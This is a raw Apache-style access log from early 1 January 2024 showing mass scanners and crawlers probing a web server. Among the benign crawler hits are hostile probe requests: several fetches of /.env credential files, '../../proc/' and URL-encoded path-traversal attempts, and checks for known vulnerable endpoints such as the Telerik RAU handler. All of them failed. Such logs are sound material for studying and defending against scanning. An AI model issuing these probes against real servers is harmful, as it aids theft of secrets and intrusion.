78.153.140.221 - - [01/Jan/2024:00:07:41 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
78.153.140.221 - - [01/Jan/2024:00:07:41 +0100] "\x16\x03\x01\x01H\x01" 501 321 "-" "-"
94.156.64.217 - - [01/Jan/2024:00:10:13 +0100] "GET //.env HTTP/1.1" 404 309 "-" "Go-http-client/1.1"
35.203.210.145 - - [01/Jan/2024:00:17:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
45.227.254.49 - - [01/Jan/2024:00:36:09 +0100] "\x03" 501 316 "-" "-"
84.54.51.29 - - [01/Jan/2024:00:37:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
205.210.31.93 - - [01/Jan/2024:00:54:08 +0100] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.93 - - [01/Jan/2024:00:54:09 +0100] "\x16\x03\x01" 501 318 "-" "-"
78.153.140.221 - - [01/Jan/2024:00:56:14 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
78.153.140.221 - - [01/Jan/2024:00:56:14 +0100] "\x16\x03\x01\x01H\x01" 501 321 "-" "-"
47.88.93.234 - - [01/Jan/2024:00:56:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36"
47.251.13.32 - - [01/Jan/2024:00:56:24 +0100] "GET /static/admin/javascript/hetong.js HTTP/1.1" 404 338 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36"
65.49.20.66 - - [01/Jan/2024:01:09:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0"
64.62.197.233 - - [01/Jan/2024:01:09:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; rv:108.0) Gecko/20100101 Firefox/108.0"
64.62.197.208 - - [01/Jan/2024:01:10:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.41"
184.105.139.68 - - [01/Jan/2024:01:10:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15"
74.82.47.4 - - [01/Jan/2024:01:10:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"
64.62.197.240 - - [01/Jan/2024:01:11:51 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0"
64.62.197.204 - - [01/Jan/2024:01:11:55 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
65.49.20.66 - - [01/Jan/2024:01:11:56 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0"
162.243.138.63 - - [01/Jan/2024:01:11:58 +0100] "MGLNDD_212.91.246.80_80" 501 338 "-" "-"
65.49.20.66 - - [01/Jan/2024:01:12:25 +0100] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0"
64.62.197.206 - - [01/Jan/2024:01:12:30 +0100] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.41"
64.62.197.231 - - [01/Jan/2024:01:12:32 +0100] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; rv:108.0) Gecko/20100101 Firefox/108.0"
184.105.139.68 - - [01/Jan/2024:01:12:33 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.56"
54.219.171.118 - - [01/Jan/2024:01:12:38 +0100] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
162.243.138.63 - - [01/Jan/2024:01:13:04 +0100] "MGLNDD_212.91.246.88_80" 501 338 "-" "-"
184.105.139.68 - - [01/Jan/2024:01:13:13 +0100] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15"
74.82.47.4 - - [01/Jan/2024:01:13:33 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15"
162.243.138.63 - - [01/Jan/2024:01:13:38 +0100] "MGLNDD_212.91.246.84_80" 501 338 "-" "-"
162.243.138.63 - - [01/Jan/2024:01:14:19 +0100] "MGLNDD_212.91.246.89_80" 501 338 "-" "-"
192.241.237.40 - - [01/Jan/2024:01:14:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
162.243.138.63 - - [01/Jan/2024:01:14:38 +0100] "MGLNDD_212.91.246.87_80" 501 338 "-" "-"
74.82.47.4 - - [01/Jan/2024:01:14:39 +0100] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"
192.241.237.40 - - [01/Jan/2024:01:14:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.237.40 - - [01/Jan/2024:01:14:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
162.243.138.63 - - [01/Jan/2024:01:15:07 +0100] "MGLNDD_212.91.246.85_80" 501 338 "-" "-"
192.241.237.40 - - [01/Jan/2024:01:15:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.237.40 - - [01/Jan/2024:01:15:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
162.243.138.63 - - [01/Jan/2024:01:15:32 +0100] "MGLNDD_212.91.246.81_80" 501 338 "-" "-"
162.243.138.63 - - [01/Jan/2024:01:15:33 +0100] "MGLNDD_212.91.246.86_80" 501 338 "-" "-"
162.243.138.63 - - [01/Jan/2024:01:15:35 +0100] "MGLNDD_212.91.246.82_80" 501 338 "-" "-"
162.243.138.63 - - [01/Jan/2024:01:15:38 +0100] "MGLNDD_212.91.246.83_80" 501 338 "-" "-"
192.241.237.40 - - [01/Jan/2024:01:15:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.237.40 - - [01/Jan/2024:01:15:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.237.40 - - [01/Jan/2024:01:16:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.237.40 - - [01/Jan/2024:01:16:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.237.40 - - [01/Jan/2024:01:16:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
80.66.88.215 - - [01/Jan/2024:01:21:52 +0100] "\x03" 501 316 "-" "-"
52.42.80.117 - - [01/Jan/2024:01:26:20 +0100] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
54.219.171.118 - - [01/Jan/2024:01:30:39 +0100] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
54.201.162.161 - - [01/Jan/2024:01:31:34 +0100] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
91.92.243.232 - - [01/Jan/2024:01:33:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
91.92.243.232 - - [01/Jan/2024:01:33:07 +0100] "GET ../../proc/ HTTP" 400 329 "-" "-"
91.92.243.232 - - [01/Jan/2024:01:33:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
91.92.243.232 - - [01/Jan/2024:01:33:14 +0100] "GET ../../proc/ HTTP" 400 329 "-" "-"
71.6.134.232 - - [01/Jan/2024:01:35:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"
176.97.210.240 - - [01/Jan/2024:01:38:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
71.6.232.28 - - [01/Jan/2024:01:40:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
207.148.75.246 - - [01/Jan/2024:01:43:52 +0100] "GET /.env HTTP/1.1" 404 309 "-" "python-requests/2.31.0"
212.36.28.70 - - [01/Jan/2024:01:51:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
71.6.134.232 - - [01/Jan/2024:01:51:43 +0100] "\x16\x03\x01" 501 318 "-" "-"
207.148.75.246 - - [01/Jan/2024:01:54:40 +0100] "GET /.env HTTP/1.1" 404 309 "-" "python-requests/2.31.0"
167.248.133.124 - - [01/Jan/2024:01:59:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.124 - - [01/Jan/2024:01:59:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.124 - - [01/Jan/2024:01:59:22 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.248.133.124 - - [01/Jan/2024:01:59:23 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
52.42.80.117 - - [01/Jan/2024:02:07:37 +0100] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
54.219.171.118 - - [01/Jan/2024:02:09:45 +0100] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
65.21.35.188 - - [01/Jan/2024:02:12:47 +0100] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)"
65.21.35.188 - - [01/Jan/2024:02:12:48 +0100] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)"
65.21.35.188 - - [01/Jan/2024:02:12:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)"
167.94.138.125 - - [01/Jan/2024:02:19:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.125 - - [01/Jan/2024:02:19:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.125 - - [01/Jan/2024:02:19:38 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.138.125 - - [01/Jan/2024:02:19:38 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
64.62.197.121 - - [01/Jan/2024:02:23:16 +0100] "\x16\x03\x01" 501 318 "-" "-"
184.105.139.68 - - [01/Jan/2024:02:23:18 +0100] "\x16\x03\x01" 501 318 "-" "-"
78.153.140.221 - - [01/Jan/2024:02:28:52 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
78.153.140.221 - - [01/Jan/2024:02:28:52 +0100] "\x16\x03\x01\x01H\x01" 501 321 "-" "-"
54.219.171.118 - - [01/Jan/2024:02:29:35 +0100] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
35.203.211.93 - - [01/Jan/2024:02:31:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
54.201.162.161 - - [01/Jan/2024:02:33:03 +0100] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
205.210.31.110 - - [01/Jan/2024:02:37:24 +0100] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.110 - - [01/Jan/2024:02:37:24 +0100] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.102 - - [01/Jan/2024:02:38:52 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
198.235.24.203 - - [01/Jan/2024:02:39:47 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.180.143.11 - - [01/Jan/2024:02:40:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [01/Jan/2024:02:40:58 +0100] "GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [01/Jan/2024:02:41:14 +0100] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [01/Jan/2024:02:41:26 +0100] "GET /favicon-32x32.png HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [01/Jan/2024:02:41:26 +0100] "GET /solr/ HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [01/Jan/2024:02:41:39 +0100] "GET /api/session/properties HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [01/Jan/2024:02:41:52 +0100] "GET /cf_scripts/scripts/ajax/ckeditor/ckeditor.js HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [01/Jan/2024:02:42:01 +0100] "GET /sitecore/shell/sitecore.version.xml HTTP/1.1" 404 340 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [01/Jan/2024:02:42:10 +0100] "GET /static/historypage.js HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [01/Jan/2024:02:42:16 +0100] "HEAD /icons/sphere1.png HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [01/Jan/2024:02:42:17 +0100] "HEAD /icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png HTTP/1.1" 400 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [01/Jan/2024:02:42:17 +0100] "HEAD /icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png HTTP/1.1" 400 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [01/Jan/2024:02:42:17 +0100] "HEAD /icons/.%2e/%2e%2e/apache2/icons/sphere1.png HTTP/1.1" 400 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [01/Jan/2024:02:42:17 +0100] "GET /admin/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [01/Jan/2024:02:42:18 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
185.180.143.11 - - [01/Jan/2024:02:42:18 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [01/Jan/2024:02:42:27 +0100] "GET /index.jsp HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [01/Jan/2024:02:42:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [01/Jan/2024:02:42:33 +0100] "GET /showLogin.cc HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [01/Jan/2024:02:42:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [01/Jan/2024:02:42:38 +0100] "GET /webfig/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [01/Jan/2024:02:42:47 +0100] "GET /sugar_version.json HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [01/Jan/2024:02:42:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
3.101.139.194 - - [01/Jan/2024:02:44:58 +0100] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
194.165.16.76 - - [01/Jan/2024:02:56:15 +0100] "\x03" 501 316 "-" "-"
54.245.41.73 - - [01/Jan/2024:03:04:26 +0100] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
162.216.150.180 - - [01/Jan/2024:03:08:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
192.241.218.63 - - [01/Jan/2024:03:09:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.218.63 - - [01/Jan/2024:03:10:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.218.63 - - [01/Jan/2024:03:10:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.218.63 - - [01/Jan/2024:03:10:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.218.63 - - [01/Jan/2024:03:10:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.218.63 - - [01/Jan/2024:03:10:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.218.63 - - [01/Jan/2024:03:11:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.218.63 - - [01/Jan/2024:03:11:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.218.63 - - [01/Jan/2024:03:11:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.218.63 - - [01/Jan/2024:03:11:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
45.33.87.154 - - [01/Jan/2024:03:22:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
47.88.90.156 - - [01/Jan/2024:03:25:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36"
47.254.85.182 - - [01/Jan/2024:03:25:53 +0100] "GET /Public/home/js/check.js HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36"
47.254.25.10 - - [01/Jan/2024:03:25:53 +0100] "GET /static/admin/javascript/hetong.js HTTP/1.1" 404 338 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36"
45.33.87.154 - - [01/Jan/2024:03:31:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
172.104.210.105 - - [01/Jan/2024:03:32:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
45.142.182.76 - - [01/Jan/2024:03:33:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
45.79.163.53 - - [01/Jan/2024:03:34:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
69.164.217.74 - - [01/Jan/2024:03:38:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
45.142.182.76 - - [01/Jan/2024:03:42:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
45.33.87.154 - - [01/Jan/2024:03:46:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
202.61.253.63 - - [01/Jan/2024:03:49:51 +0100] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
202.61.253.63 - - [01/Jan/2024:03:49:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
45.79.181.179 - - [01/Jan/2024:03:51:29 +0100] "\x16\x03\x01" 501 318 "-" "-"
45.33.80.243 - - [01/Jan/2024:03:51:42 +0100] "\x16\x03\x01" 501 318 "-" "-"
207.90.244.14 - - [01/Jan/2024:03:52:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
207.90.244.14 - - [01/Jan/2024:03:52:12 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
207.90.244.14 - - [01/Jan/2024:03:52:12 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
207.90.244.14 - - [01/Jan/2024:03:52:13 +0100] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "-"
207.90.244.14 - - [01/Jan/2024:03:52:13 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36"
69.164.217.74 - - [01/Jan/2024:03:55:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
35.206.153.39 - - [01/Jan/2024:03:55:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; d8934ebdbd) Chrome/84.0.4147.105 Safari/537.36"
35.206.153.39 - - [01/Jan/2024:03:55:34 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; d8934ebdbd) Chrome/84.0.4147.105 Safari/537.36"
45.79.163.53 - - [01/Jan/2024:03:56:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
45.79.172.21 - - [01/Jan/2024:03:57:28 +0100] "\x16\x03\x01" 501 318 "-" "-"
165.154.118.145 - - [01/Jan/2024:03:57:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 8_0_2; Win64; x64) AppleWebKit/595.39 (KHTML, like Gecko) Chrome/50.0.550 Safari/537.36"
165.154.118.145 - - [01/Jan/2024:03:57:37 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 9_1) AppleWebKit/580.48 (KHTML, like Gecko) Chrome/104.0.970 Safari/537.36"
